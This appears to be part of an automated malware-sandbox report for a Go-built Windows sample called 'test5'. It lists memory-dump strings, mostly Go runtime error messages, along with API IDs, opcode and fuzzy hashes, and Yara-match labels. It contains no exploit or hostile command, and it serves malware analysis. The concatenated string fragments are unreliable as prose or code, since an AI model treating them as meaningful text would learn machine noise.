                      • String ID: /n$ 1n$ 2n$/gc/gogc:percent, not a functiongc: unswept span KiB work (bg), mheap.sweepgen=runtime: nelems=workbuf is emptymSpanList.removemSpanList.insertbad special kindbad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod$/gc/heap/allocs-by-size:bytes/gc/stack/starting-size:bytesgc done but gcphase != _GCoffruntime: p.gcMarkWorkerMode= scanobject of a noscan objectruntime: marking free object addspecial on invalid pointerruntime: summary max pages = runtime: levelShift[level] =$/gc/heap/allocs:bytesruntime: work.nwait= previous allocCount=, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep$/gc/heap/allocs:objectsmissing type in runfinqruntime: internal errorwork.nwait > work.nprocleft over markroot jobsgcDrain phase incorrectMB during sweep; swept bad profile stack countruntime: netpoll failedpanic during preemptoffnanotime returning zerofatal: $/gc/heap/frees-by-size:bytes/gc/heap/tiny/allocs:objects/sched/goroutines:goroutinesgcBgMarkWorker: mode not setmspan.sweep: m is not lockedfound pointer to free objectmheap.freeSpanLocked - span runtime.semasleep unexpectedfatal: morestack on gsignalruntime:$/gc/heap/frees:objectsruntime: work.nwait = runtime:scanstack: gp=scanstack - bad statusheadTailIndex overflowruntime.main not on m0set_crosscall2 missingbad g->status in readywirep: invalid p stateassembly checks failedstack not a power of 2minpc or maxpc inv$/gc/heap/goal:bytes/gc/heap/live:bytesbad kind in runfinqmarkroot: bad indexnwait > work.nprocs, gp->atomicstatus=marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not foundwinmm.dll not$/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of memoryruntime: p.searchAddr = range partially overlapsstack trace unavaila$/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus old$/gc/pauses:seconds because dotdotdotruntime: npages = invalid skip valueruntime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr frames elided..., locked to threadruntime.$/gc/scan/stack:bytes/gc/scan/total:bytes/gc/heap/frees:bytes/gc/gomemlimit:bytesp mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitpreempt off reason: forcegc: phase error$/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listruntime.Pinner: argument is nilcasgstatus: bad incoming valuesresetspinning: not a spinning mruntime: profBuf already closedruntime: spl$/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedruntime: source value is too largeVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning wit$/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: incons$/memory/classes/metadata/mcache/free:bytes/memory/classes/metadata/mspan/inuse:bytesnon-empty mark queue after concurrent marksweep: tried to preserve a user arena spanruntime: blocked write on closing polldescacquireSudog: found s.elem != nil in cachefatal er$/memory/classes/metadata/mcache/inuse:bytesruntime.SetFinalizer: first argument is nilruntime.SetFinalizer: finalizer already setgcBgMarkWorker: unexpected gcMarkWorkerModenon in-use span found with specials bit setgrew heap, but no adequate free space foundro$/memory/classes/metadata/mspan/free:bytesruntime.SetFinalizer: second argument is gcSweep being done but phase is not GCoffobjects added out of order or overlappingmheap.freeSpanLocked - invalid stack freemheap.freeSpanLocked - invalid span stateattempted to a$/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime:$/memory/classes/other:bytes/memory/classes/total:bytesfailed to set sweep barrierwork.nwait was > work.nproc not in stack roots range [allocated pages below zero?address not a stack addressmspan.sweep: bad span stateinvalid profile bucket typeruntime: corrupte$/memory/classes/profiling/buckets:bytesmspan.sweep: bad span state after sweepruntime: blocked write on free polldescPowerRegisterSuspendResumeNotification$/sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplockedm: not runnablereleasep: invalid p statecheckdead: no p for timercheckdead:$/sched/pauses/total/gc:seconds/sync/mutex/wait/total:seconds/godebug/non-default-behavior/bcryptprimitives.dll not foundpanic called with nil argumentcheckdead: inconsistent countsrunqputslow: queue is not fullruntime: bad pointer in frame invalid pointer foun$@/n$@0n$@1n$@3n$`/n$`0n$`1n$*n$.n$/n$0n
                      • API String ID: 0-3924829288
                      • Opcode ID: 75c677a2bcaddd2b3de46786a0d3c71e491cfd739726991b7ce706cfa695141e
                      • Instruction ID: 5a911ab05df6a9a3b926dbd3dda3096a93134ba4cc30f6a609e4ff8c360c8723
                      • Opcode Fuzzy Hash: 75c677a2bcaddd2b3de46786a0d3c71e491cfd739726991b7ce706cfa695141e
                      • Instruction Fuzzy Hash: BC621676209B8585FF25CB15E8943AA73A6F388784F95C03ACA8E47B65EF7CC845C740
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                      • String ID: $@
                      • API String ID: 3613058218-1077428164
                      • Opcode ID: 378339f2bfa88e71ac19cea4aeeb69c74ed1450f75d131b3461b833e448d52f1
                      • Instruction ID: 6b5684cde5377eab6a37657ab1ce2392309429cec7f5f0b9ab63d39d72f93419
                      • Opcode Fuzzy Hash: 378339f2bfa88e71ac19cea4aeeb69c74ed1450f75d131b3461b833e448d52f1
                      • Instruction Fuzzy Hash: D6621C309D8E69DAF7689A78C4C93F9BBD2FBF5700FA4459DD887C31C1D62AD8028641
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                      • String ID: $@
                      • API String ID: 3613058218-1077428164
                      • Opcode ID: 378339f2bfa88e71ac19cea4aeeb69c74ed1450f75d131b3461b833e448d52f1
                      • Instruction ID: 20e6b867551da9b0770f36e4b23eb09bdde07dad698dc2f9129ce85a09d1406c
                      • Opcode Fuzzy Hash: 378339f2bfa88e71ac19cea4aeeb69c74ed1450f75d131b3461b833e448d52f1
                      • Instruction Fuzzy Hash: C762CA30D2CE65DAF7AC9A1888693FB7BD2FBE5300FA4417DD48F831D2D6649E428641
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                      • String ID:
                      • API String ID: 3613058218-3916222277
                      • Opcode ID: ab974c686d4cf2a6d6f964f9f08ddbfde3681fa99218c6095000c369d33f032e
                      • Instruction ID: 59d60c4cbb43e9bc84f943f104cba0502ff6121e71813c0f1f3dba9b9e3d4354
                      • Opcode Fuzzy Hash: ab974c686d4cf2a6d6f964f9f08ddbfde3681fa99218c6095000c369d33f032e
                      • Instruction Fuzzy Hash: E2623C309D8F69DAF7689A18C4D93F97BD2FBF5304FA4419DD887C31C2D626D8128682
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                      • String ID:
                      • API String ID: 3613058218-3916222277
                      • Opcode ID: ab974c686d4cf2a6d6f964f9f08ddbfde3681fa99218c6095000c369d33f032e
                      • Instruction ID: c63bdaddcf91f926b6d98605d96b44f93101cf668e535d1d567a72bb3bdf30c9
                      • Opcode Fuzzy Hash: ab974c686d4cf2a6d6f964f9f08ddbfde3681fa99218c6095000c369d33f032e
                      • Instruction Fuzzy Hash: 79620C30D38E69DBF7AC9A5884593EB77D2FBF5300FA401ADD49FC31C2D6249A424692
                      Strings
                      • MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}sched={pc:, xrefs: 006985E5
                      • non-concurrent sweep failed to drain all sweep queuesruntime: NtCancelWaitCompletionPacket failed; errno= exited a goroutine internally locked to the OS threadcompileCallback: argument size is larger than uintptrmin size of malloc header is not a size class bo, xrefs: 006987D8
                      • &n, xrefs: 0069873F
                      • gc %: gp *(in n= ) - NaN P m= MPC= < end > ]:???pc= G125625EOFintmapMayUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltcgodnsudpftpssh::1se, xrefs: 0069815A
                      • MB goal, s.state = s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc=, xrefs: 006985A5
                      • failed to set sweep barrierwork.nwait was > work.nproc not in stack roots range [allocated pages below zero?address not a stack addressmspan.sweep: bad span stateinvalid profile bucket typeruntime: corrupted polldescruntime: netpollinit failedruntime: asyncPre, xrefs: 006987E9
                      • , xrefs: 00697FCB
                      • ., xrefs: 006980DD
                      • ms cpu, (forced) wbuf1.n= wbuf2.n= s.limit= s.state= B work ( B exp.) marked unmarked in use), size = bad prune, tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)traceback} stack=, xrefs: 00698525
                      • gc done but gcphase != _GCoffruntime: p.gcMarkWorkerMode= scanobject of a noscan objectruntime: marking free object addspecial on invalid pointerruntime: summary max pages = runtime: levelShift[level] = doRecordGoroutineProfile gp1=NtCreateWaitCompletionPacket, xrefs: 006987FA
                      • ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACE, xrefs: 006982ED
                      • gcing MB, got= ... max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:1562578125int16int32int64uint8arraysliceMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930Localfilesimap2imap3imapspop3shostssse41sse42ssse3parseutf-8%s*%dtext/Greek, xrefs: 00697AB2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: $ &n$ MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}sched={pc:$ MB goal, s.state = s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc=$ ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACE$ ms cpu, (forced) wbuf1.n= wbuf2.n= s.limit= s.state= B work ( B exp.) marked unmarked in use), size = bad prune, tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)traceback} stack=$.$failed to set sweep barrierwork.nwait was > work.nproc not in stack roots range [allocated pages below zero?address not a stack addressmspan.sweep: bad span stateinvalid profile bucket typeruntime: corrupted polldescruntime: netpollinit failedruntime: asyncPre$gc %: gp *(in n= ) - NaN P m= MPC= < end > ]:???pc= G125625EOFintmapMayUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltcgodnsudpftpssh::1se$gc done but gcphase != _GCoffruntime: p.gcMarkWorkerMode= scanobject of a noscan objectruntime: marking free object addspecial on invalid pointerruntime: summary max pages = runtime: levelShift[level] = doRecordGoroutineProfile gp1=NtCreateWaitCompletionPacket$gcing MB, got= ... max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:1562578125int16int32int64uint8arraysliceMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930Localfilesimap2imap3imapspop3shostssse41sse42ssse3parseutf-8%s*%dtext/Greek$non-concurrent sweep failed to drain all sweep queuesruntime: NtCancelWaitCompletionPacket failed; errno= exited a goroutine internally locked to the OS threadcompileCallback: argument size is larger than uintptrmin size of malloc header is not a size class bo
                      • API String ID: 0-1309298311
                      • Opcode ID: b73bc3cca150b57e16f380ba732e93f41d67d5452e04359ef8584975afe4fe5f
                      • Instruction ID: d26db3dd125efb74b70664bd2665c1d76701da5b512f561f1fdf241b5185ccd9
                      • Opcode Fuzzy Hash: b73bc3cca150b57e16f380ba732e93f41d67d5452e04359ef8584975afe4fe5f
                      • Instruction Fuzzy Hash: 1372C476608BC089DB61DF15E8813EE77AAF78A780F44812ADA8C43B66DF3CC084C755
                      Strings
                      • , j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type 19531259765625invaliduintptrChanDir Value>TuesdayJanuaryOctoberMUI_StdMUI_Dltwindowswsarecvwsasendlookup avx512fnil keytls3descharset\\.\UNCos/execr, xrefs: 006A9A7A
                      • runtime: levelShift[level] = doRecordGoroutineProfile gp1=NtCreateWaitCompletionPacket, xrefs: 006A9B45
                      • runtime: npages = invalid skip valueruntime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr frames elided..., locked to threadruntime.semacreateruntime.semawakeup29802322, xrefs: 006A9605
                      • ] = (usageinit ms, fault and tab= top=[...], fp:1562578125int16int32int64uint8arraysliceMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930Localfilesimap2imap3imapspop3shostssse41sse42ssse3parseutf-8%s*%dtext/Greek (at ClassSHA-1StringFormat[]bytest, xrefs: 006A9586
                      • runtime: p.searchAddr = range partially overlapsstack trace unavailablebindm in unexpected GOOSruntime: mp.lockedInt = runqsteal: runq overflowdouble traceGCSweepStartbad use of trace.seqlock116415321826934814453125582076609134674072265625connection reset by , xrefs: 006A9AC5
                      • , levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime: newstack at runtime:, xrefs: 006A9B65
                      • , npages = p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACEBACK) at entry+ (targetpc= , plugin: runtime: g : frame.sp=created by 30517578125bad messagefile existsbad add, xrefs: 006A9A5C
                      • ] = pc=+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=3125boolint8uintchanfunccallkind on JuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDTicmpigmpftpspop3smtpdial unixermssse3avx2bmi1bmi2xn--timebitsNameTypecx16sse2false<ni, xrefs: 006A99D4
                      • bad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod, xrefs: 006A962F, 006A9D8C
                      • , i = code= addr= m->p= p->m=SCHED curg= ctxt: min= max= bad ts(...) m=nil base 390625uint16uint32uint64structchan<-<-chan ValueSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13netdnsdomaingophertelnetreturn.local.onionip+netrdtscppopcntX25519Co, xrefs: 006A9AE5
                      • runtime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb, xrefs: 006A954D, 006A9992
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: , i = code= addr= m->p= p->m=SCHED curg= ctxt: min= max= bad ts(...) m=nil base 390625uint16uint32uint64structchan<-<-chan ValueSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13netdnsdomaingophertelnetreturn.local.onionip+netrdtscppopcntX25519Co$, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type 19531259765625invaliduintptrChanDir Value>TuesdayJanuaryOctoberMUI_StdMUI_Dltwindowswsarecvwsasendlookup avx512fnil keytls3descharset\\.\UNCos/execr$, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime: newstack at runtime:$, npages = p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACEBACK) at entry+ (targetpc= , plugin: runtime: g : frame.sp=created by 30517578125bad messagefile existsbad add$] = pc=+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=3125boolint8uintchanfunccallkind on JuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDTicmpigmpftpspop3smtpdial unixermssse3avx2bmi1bmi2xn--timebitsNameTypecx16sse2false<ni$] = (usageinit ms, fault and tab= top=[...], fp:1562578125int16int32int64uint8arraysliceMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930Localfilesimap2imap3imapspop3shostssse41sse42ssse3parseutf-8%s*%dtext/Greek (at ClassSHA-1StringFormat[]bytest$bad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod$runtime: levelShift[level] = doRecordGoroutineProfile gp1=NtCreateWaitCompletionPacket$runtime: npages = invalid skip valueruntime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr frames elided..., locked to threadruntime.semacreateruntime.semawakeup29802322$runtime: p.searchAddr = range partially overlapsstack trace unavailablebindm in unexpected GOOSruntime: mp.lockedInt = runqsteal: runq overflowdouble traceGCSweepStartbad use of trace.seqlock116415321826934814453125582076609134674072265625connection reset by $runtime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb
                      • API String ID: 0-3623285289
                      • Opcode ID: 924291ffc78aa9876ca91004933764638917c258110995a5e11da2020c2abb45
                      • Instruction ID: 5b203ea9d7c9e052482eb51e149c342df77fa6184da409ec55553b4258bb19cd
                      • Opcode Fuzzy Hash: 924291ffc78aa9876ca91004933764638917c258110995a5e11da2020c2abb45
                      • Instruction Fuzzy Hash: AA32CCB6718BC581DB60AF11F8403EAA36AF789BC0F504026DE9D17B5ADF38C985CB54
                      Strings
                      • runtime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unknown mark worker modecannot free workbufs when work.full != 0runtime: out of memory: cannot allocate runtime.preemptM: duplicatehandle failedstopTheWorld: broken, xrefs: 006965E6
                      • nil elem type! to finalizer GC worker initruntime: full=runtime: want=MB; allocated RtlGetVersion, xrefs: 006965B6
                      • runtime.SetFinalizer: first argument was allocated into an arenacompileCallback: expected function with one uintptr-sized resultattempted to trace stack of a goroutine this thread does not ownuser arena chunk size is not a multiple of the physical page sizerun, xrefs: 006965A5
                      • runtime.SetFinalizer: second argument is gcSweep being done but phase is not GCoffobjects added out of order or overlappingmheap.freeSpanLocked - invalid stack freemheap.freeSpanLocked - invalid span stateattempted to add zero-sized address rangeruntime: block, xrefs: 006964FF
                      • runtime.SetFinalizer: first argument is nilruntime.SetFinalizer: finalizer already setgcBgMarkWorker: unexpected gcMarkWorkerModenon in-use span found with specials bit setgrew heap, but no adequate free space foundroot level max pages doesn't fit in summaryru, xrefs: 006965F7
                      • , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failed, xrefs: 006965D7
                      • runtime.SetFinalizer: pointer not in allocated blockruntime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetruntime: GetQueuedCompletionStatusEx failed (errno= runtime: NtCreateWaitCompletionPacket failed; errno=, xrefs: 00696594
                      • runtime.SetFinalizer: pointer not at beginning of allocated blockreflect: reflect.Value.UnsafePointer on an invalid notinheap pointerembedded IPv4 address must replace the final 2 fields of the addressruntime.Pinner: found leaking pinned pointer; forgot to cal, xrefs: 00696510
                      • , not a functiongc: unswept span KiB work (bg), mheap.sweepgen=runtime: nelems=workbuf is emptymSpanList.removemSpanList.insertbad special kindbad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod, xrefs: 006964F0
                      • because dotdotdotruntime: npages = invalid skip valueruntime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr frames elided..., locked to threadruntime.semacreateruntime., xrefs: 00696490
                      • runtime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedruntime: source value is too largeVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workentersyscallblock inco, xrefs: 0069640C, 00696463, 006964CB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: because dotdotdotruntime: npages = invalid skip valueruntime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr frames elided..., locked to threadruntime.semacreateruntime.$, not a functiongc: unswept span KiB work (bg), mheap.sweepgen=runtime: nelems=workbuf is emptymSpanList.removemSpanList.insertbad special kindbad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod$, not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failed$nil elem type! to finalizer GC worker initruntime: full=runtime: want=MB; allocated RtlGetVersion$runtime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedruntime: source value is too largeVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workentersyscallblock inco$runtime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unknown mark worker modecannot free workbufs when work.full != 0runtime: out of memory: cannot allocate runtime.preemptM: duplicatehandle failedstopTheWorld: broken$runtime.SetFinalizer: first argument is nilruntime.SetFinalizer: finalizer already setgcBgMarkWorker: unexpected gcMarkWorkerModenon in-use span found with specials bit setgrew heap, but no adequate free space foundroot level max pages doesn't fit in summaryru$runtime.SetFinalizer: first argument was allocated into an arenacompileCallback: expected function with one uintptr-sized resultattempted to trace stack of a goroutine this thread does not ownuser arena chunk size is not a multiple of the physical page sizerun$runtime.SetFinalizer: pointer not at beginning of allocated blockreflect: reflect.Value.UnsafePointer on an invalid notinheap pointerembedded IPv4 address must replace the final 2 fields of the addressruntime.Pinner: found leaking pinned pointer; forgot to cal$runtime.SetFinalizer: pointer not in allocated blockruntime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetruntime: GetQueuedCompletionStatusEx failed (errno= runtime: NtCreateWaitCompletionPacket failed; errno=$runtime.SetFinalizer: second argument is gcSweep being done but phase is not GCoffobjects added out of order or overlappingmheap.freeSpanLocked - invalid stack freemheap.freeSpanLocked - invalid span 